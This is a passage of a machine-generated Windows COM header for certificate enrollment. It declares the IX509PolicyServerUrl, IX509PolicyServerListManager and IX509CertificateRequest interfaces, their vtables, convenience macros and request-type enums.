            /* [in] */ DWORD value) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetStringProperty( 
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE SetStringProperty( 
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [in] */ __RPC__in BSTR pValue) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE UpdateRegistry( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE RemoveFromRegistry( 
            /* [in] */ X509CertificateEnrollmentContext context) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PolicyServerUrlVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PolicyServerUrl * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PolicyServerUrl * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PolicyServerUrl * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Url )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Url )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ __RPC__in BSTR pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Default )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Default )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ VARIANT_BOOL value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Flags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out PolicyServerUrlFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Flags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlFlags Flags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AuthFlags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out X509EnrollmentAuthFlags *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AuthFlags )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509EnrollmentAuthFlags Flags);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Cost )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [retval][out] */ __RPC__out DWORD *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Cost )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ DWORD value);
        
        HRESULT ( STDMETHODCALLTYPE *GetStringProperty )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *ppValue);
        
        HRESULT ( STDMETHODCALLTYPE *SetStringProperty )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ PolicyServerUrlPropertyID propertyId,
            /* [in] */ __RPC__in BSTR pValue);
        
        HRESULT ( STDMETHODCALLTYPE *UpdateRegistry )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        HRESULT ( STDMETHODCALLTYPE *RemoveFromRegistry )( 
            __RPC__in IX509PolicyServerUrl * This,
            /* [in] */ X509CertificateEnrollmentContext context);
        
        END_INTERFACE
    } IX509PolicyServerUrlVtbl;

    interface IX509PolicyServerUrl
    {
        CONST_VTBL struct IX509PolicyServerUrlVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PolicyServerUrl_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PolicyServerUrl_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PolicyServerUrl_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PolicyServerUrl_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PolicyServerUrl_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PolicyServerUrl_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PolicyServerUrl_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PolicyServerUrl_Initialize(This,context)	\
    ( (This)->lpVtbl -> Initialize(This,context) ) 

#define IX509PolicyServerUrl_get_Url(This,ppValue)	\
    ( (This)->lpVtbl -> get_Url(This,ppValue) ) 

#define IX509PolicyServerUrl_put_Url(This,pValue)	\
    ( (This)->lpVtbl -> put_Url(This,pValue) ) 

#define IX509PolicyServerUrl_get_Default(This,pValue)	\
    ( (This)->lpVtbl -> get_Default(This,pValue) ) 

#define IX509PolicyServerUrl_put_Default(This,value)	\
    ( (This)->lpVtbl -> put_Default(This,value) ) 

#define IX509PolicyServerUrl_get_Flags(This,pValue)	\
    ( (This)->lpVtbl -> get_Flags(This,pValue) ) 

#define IX509PolicyServerUrl_put_Flags(This,Flags)	\
    ( (This)->lpVtbl -> put_Flags(This,Flags) ) 

#define IX509PolicyServerUrl_get_AuthFlags(This,pValue)	\
    ( (This)->lpVtbl -> get_AuthFlags(This,pValue) ) 

#define IX509PolicyServerUrl_put_AuthFlags(This,Flags)	\
    ( (This)->lpVtbl -> put_AuthFlags(This,Flags) ) 

#define IX509PolicyServerUrl_get_Cost(This,pValue)	\
    ( (This)->lpVtbl -> get_Cost(This,pValue) ) 

#define IX509PolicyServerUrl_put_Cost(This,value)	\
    ( (This)->lpVtbl -> put_Cost(This,value) ) 

#define IX509PolicyServerUrl_GetStringProperty(This,propertyId,ppValue)	\
    ( (This)->lpVtbl -> GetStringProperty(This,propertyId,ppValue) ) 

#define IX509PolicyServerUrl_SetStringProperty(This,propertyId,pValue)	\
    ( (This)->lpVtbl -> SetStringProperty(This,propertyId,pValue) ) 

#define IX509PolicyServerUrl_UpdateRegistry(This,context)	\
    ( (This)->lpVtbl -> UpdateRegistry(This,context) ) 

#define IX509PolicyServerUrl_RemoveFromRegistry(This,context)	\
    ( (This)->lpVtbl -> RemoveFromRegistry(This,context) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PolicyServerUrl_INTERFACE_DEFINED__ */


#ifndef __IX509PolicyServerListManager_INTERFACE_DEFINED__
#define __IX509PolicyServerListManager_INTERFACE_DEFINED__

/* interface IX509PolicyServerListManager */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509PolicyServerListManager;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("884e204b-217d-11da-b2a4-000e7bbb2b09")
    IX509PolicyServerListManager : public IDispatch
    {
    public:
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_ItemByIndex( 
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509PolicyServerUrl **pVal) = 0;
        
        virtual /* [helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get_Count( 
            /* [retval][out] */ __RPC__out long *pVal) = 0;
        
        virtual /* [restricted][helpstring][id][propget] */ HRESULT STDMETHODCALLTYPE get__NewEnum( 
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Add( 
            /* [in] */ __RPC__in_opt IX509PolicyServerUrl *pVal) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Remove( 
            /* [in] */ LONG Index) = 0;
        
        virtual /* [helpstring][id] */ HRESULT STDMETHODCALLTYPE Clear( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ PolicyServerUrlFlags Flags) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509PolicyServerListManagerVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509PolicyServerListManager * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ItemByIndex )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ LONG Index,
            /* [retval][out] */ __RPC__deref_out_opt IX509PolicyServerUrl **pVal);
        
        /* [helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get_Count )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [retval][out] */ __RPC__out long *pVal);
        
        /* [restricted][helpstring][id][propget] */ HRESULT ( STDMETHODCALLTYPE *get__NewEnum )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [retval][out] */ __RPC__deref_out_opt LPUNKNOWN *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Add )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ __RPC__in_opt IX509PolicyServerUrl *pVal);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Remove )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ LONG Index);
        
        /* [helpstring][id] */ HRESULT ( STDMETHODCALLTYPE *Clear )( 
            __RPC__in IX509PolicyServerListManager * This);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509PolicyServerListManager * This,
            /* [in] */ X509CertificateEnrollmentContext context,
            /* [in] */ PolicyServerUrlFlags Flags);
        
        END_INTERFACE
    } IX509PolicyServerListManagerVtbl;

    interface IX509PolicyServerListManager
    {
        CONST_VTBL struct IX509PolicyServerListManagerVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509PolicyServerListManager_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509PolicyServerListManager_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509PolicyServerListManager_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509PolicyServerListManager_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509PolicyServerListManager_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509PolicyServerListManager_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509PolicyServerListManager_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509PolicyServerListManager_get_ItemByIndex(This,Index,pVal)	\
    ( (This)->lpVtbl -> get_ItemByIndex(This,Index,pVal) ) 

#define IX509PolicyServerListManager_get_Count(This,pVal)	\
    ( (This)->lpVtbl -> get_Count(This,pVal) ) 

#define IX509PolicyServerListManager_get__NewEnum(This,pVal)	\
    ( (This)->lpVtbl -> get__NewEnum(This,pVal) ) 

#define IX509PolicyServerListManager_Add(This,pVal)	\
    ( (This)->lpVtbl -> Add(This,pVal) ) 

#define IX509PolicyServerListManager_Remove(This,Index)	\
    ( (This)->lpVtbl -> Remove(This,Index) ) 

#define IX509PolicyServerListManager_Clear(This)	\
    ( (This)->lpVtbl -> Clear(This) ) 

#define IX509PolicyServerListManager_Initialize(This,context,Flags)	\
    ( (This)->lpVtbl -> Initialize(This,context,Flags) ) 

#endif /* COBJMACROS */


#endif 	/* C style interface */




#endif 	/* __IX509PolicyServerListManager_INTERFACE_DEFINED__ */


/* interface __MIDL_itf_certenroll_0000_0075 */
/* [local] */ 

typedef 
enum X509RequestType
    {
        TypeAny	= 0,
        TypePkcs10	= 1,
        TypePkcs7	= 2,
        TypeCmc	= 3,
        TypeCertificate	= 4
    } 	X509RequestType;

typedef 
enum X509RequestInheritOptions
    {
        InheritDefault	= 0,
        InheritNewDefaultKey	= 0x1,
        InheritNewSimilarKey	= 0x2,
        InheritPrivateKey	= 0x3,
        InheritPublicKey	= 0x4,
        InheritKeyMask	= 0xf,
        InheritNone	= 0x10,
        InheritRenewalCertificateFlag	= 0x20,
        InheritTemplateFlag	= 0x40,
        InheritSubjectFlag	= 0x80,
        InheritExtensionsFlag	= 0x100,
        InheritSubjectAltNameFlag	= 0x200,
        InheritValidityPeriodFlag	= 0x400,
        InheritReserved80000000	= 0x80000000
    } 	X509RequestInheritOptions;

typedef 
enum InnerRequestLevel
    {
        LevelInnermost	= 0,
        LevelNext	= 1
    } 	InnerRequestLevel;



extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0075_v0_0_c_ifspec;
extern RPC_IF_HANDLE __MIDL_itf_certenroll_0000_0075_v0_0_s_ifspec;

#ifndef __IX509CertificateRequest_INTERFACE_DEFINED__
#define __IX509CertificateRequest_INTERFACE_DEFINED__

/* interface IX509CertificateRequest */
/* [helpstring][dual][uuid][object] */ 


EXTERN_C const IID IID_IX509CertificateRequest;

#if defined(__cplusplus) && !defined(CINTERFACE)
    
    MIDL_INTERFACE("728ab341-217d-11da-b2a4-000e7bbb2b09")
    IX509CertificateRequest : public IDispatch
    {
    public:
        virtual HRESULT STDMETHODCALLTYPE Initialize( 
            /* [in] */ X509CertificateEnrollmentContext Context) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE Encode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE ResetForEncode( void) = 0;
        
        virtual HRESULT STDMETHODCALLTYPE GetInnerRequest( 
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Type( 
            /* [retval][out] */ __RPC__out X509RequestType *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_EnrollmentContext( 
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_Silent( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_Silent( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_ParentWindow( 
            /* [retval][out] */ __RPC__out LONG *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_ParentWindow( 
            /* [in] */ LONG Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_UIContextMessage( 
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_UIContextMessage( 
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_SuppressDefaults( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_SuppressDefaults( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RenewalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_RenewalCertificate( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_ClientId( 
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_ClientId( 
            /* [in] */ RequestClientInfoClientId Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_CspInformations( 
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_CspInformations( 
            /* [in] */ __RPC__in_opt ICspInformations *pValue) = 0;
        
        virtual /* [custom][propget] */ HRESULT STDMETHODCALLTYPE get_HashAlgorithm( 
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue) = 0;
        
        virtual /* [custom][propput] */ HRESULT STDMETHODCALLTYPE put_HashAlgorithm( 
            /* [in] */ __RPC__in_opt IObjectId *pValue) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_AlternateSignatureAlgorithm( 
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue) = 0;
        
        virtual /* [propput] */ HRESULT STDMETHODCALLTYPE put_AlternateSignatureAlgorithm( 
            /* [in] */ VARIANT_BOOL Value) = 0;
        
        virtual /* [propget] */ HRESULT STDMETHODCALLTYPE get_RawData( 
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue) = 0;
        
    };
    
    
#else 	/* C style interface */

    typedef struct IX509CertificateRequestVtbl
    {
        BEGIN_INTERFACE
        
        HRESULT ( STDMETHODCALLTYPE *QueryInterface )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [annotation][iid_is][out] */ 
            _COM_Outptr_  void **ppvObject);
        
        ULONG ( STDMETHODCALLTYPE *AddRef )( 
            __RPC__in IX509CertificateRequest * This);
        
        ULONG ( STDMETHODCALLTYPE *Release )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfoCount )( 
            __RPC__in IX509CertificateRequest * This,
            /* [out] */ __RPC__out UINT *pctinfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetTypeInfo )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ UINT iTInfo,
            /* [in] */ LCID lcid,
            /* [out] */ __RPC__deref_out_opt ITypeInfo **ppTInfo);
        
        HRESULT ( STDMETHODCALLTYPE *GetIDsOfNames )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in REFIID riid,
            /* [size_is][in] */ __RPC__in_ecount_full(cNames) LPOLESTR *rgszNames,
            /* [range][in] */ __RPC__in_range(0,16384) UINT cNames,
            /* [in] */ LCID lcid,
            /* [size_is][out] */ __RPC__out_ecount_full(cNames) DISPID *rgDispId);
        
        /* [local] */ HRESULT ( STDMETHODCALLTYPE *Invoke )( 
            IX509CertificateRequest * This,
            /* [annotation][in] */ 
            _In_  DISPID dispIdMember,
            /* [annotation][in] */ 
            _In_  REFIID riid,
            /* [annotation][in] */ 
            _In_  LCID lcid,
            /* [annotation][in] */ 
            _In_  WORD wFlags,
            /* [annotation][out][in] */ 
            _In_  DISPPARAMS *pDispParams,
            /* [annotation][out] */ 
            _Out_opt_  VARIANT *pVarResult,
            /* [annotation][out] */ 
            _Out_opt_  EXCEPINFO *pExcepInfo,
            /* [annotation][out] */ 
            _Out_opt_  UINT *puArgErr);
        
        HRESULT ( STDMETHODCALLTYPE *Initialize )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ X509CertificateEnrollmentContext Context);
        
        HRESULT ( STDMETHODCALLTYPE *Encode )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *ResetForEncode )( 
            __RPC__in IX509CertificateRequest * This);
        
        HRESULT ( STDMETHODCALLTYPE *GetInnerRequest )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ InnerRequestLevel Level,
            /* [retval][out] */ __RPC__deref_out_opt IX509CertificateRequest **ppValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Type )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out X509RequestType *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_EnrollmentContext )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out X509CertificateEnrollmentContext *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_Silent )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_Silent )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_ParentWindow )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out LONG *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_ParentWindow )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ LONG Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_UIContextMessage )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_UIContextMessage )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_SuppressDefaults )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_SuppressDefaults )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RenewalCertificate )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_RenewalCertificate )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [in] */ __RPC__in BSTR Value);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_ClientId )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out RequestClientInfoClientId *pValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_ClientId )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ RequestClientInfoClientId Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_CspInformations )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt ICspInformations **ppValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_CspInformations )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in_opt ICspInformations *pValue);
        
        /* [custom][propget] */ HRESULT ( STDMETHODCALLTYPE *get_HashAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__deref_out_opt IObjectId **ppValue);
        
        /* [custom][propput] */ HRESULT ( STDMETHODCALLTYPE *put_HashAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ __RPC__in_opt IObjectId *pValue);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [retval][out] */ __RPC__out VARIANT_BOOL *pValue);
        
        /* [propput] */ HRESULT ( STDMETHODCALLTYPE *put_AlternateSignatureAlgorithm )( 
            __RPC__in IX509CertificateRequest * This,
            /* [in] */ VARIANT_BOOL Value);
        
        /* [propget] */ HRESULT ( STDMETHODCALLTYPE *get_RawData )( 
            __RPC__in IX509CertificateRequest * This,
            /* [defaultvalue][in] */ EncodingType Encoding,
            /* [retval][out] */ __RPC__deref_out_opt BSTR *pValue);
        
        END_INTERFACE
    } IX509CertificateRequestVtbl;

    interface IX509CertificateRequest
    {
        CONST_VTBL struct IX509CertificateRequestVtbl *lpVtbl;
    };

    

#ifdef COBJMACROS


#define IX509CertificateRequest_QueryInterface(This,riid,ppvObject)	\
    ( (This)->lpVtbl -> QueryInterface(This,riid,ppvObject) ) 

#define IX509CertificateRequest_AddRef(This)	\
    ( (This)->lpVtbl -> AddRef(This) ) 

#define IX509CertificateRequest_Release(This)	\
    ( (This)->lpVtbl -> Release(This) ) 


#define IX509CertificateRequest_GetTypeInfoCount(This,pctinfo)	\
    ( (This)->lpVtbl -> GetTypeInfoCount(This,pctinfo) ) 

#define IX509CertificateRequest_GetTypeInfo(This,iTInfo,lcid,ppTInfo)	\
    ( (This)->lpVtbl -> GetTypeInfo(This,iTInfo,lcid,ppTInfo) ) 

#define IX509CertificateRequest_GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId)	\
    ( (This)->lpVtbl -> GetIDsOfNames(This,riid,rgszNames,cNames,lcid,rgDispId) ) 

#define IX509CertificateRequest_Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr)	\
    ( (This)->lpVtbl -> Invoke(This,dispIdMember,riid,lcid,wFlags,pDispParams,pVarResult,pExcepInfo,puArgErr) ) 


#define IX509CertificateRequest_Initialize(This,Context)	\
    ( (This)->lpVtbl -> Initialize(This,Context) ) 

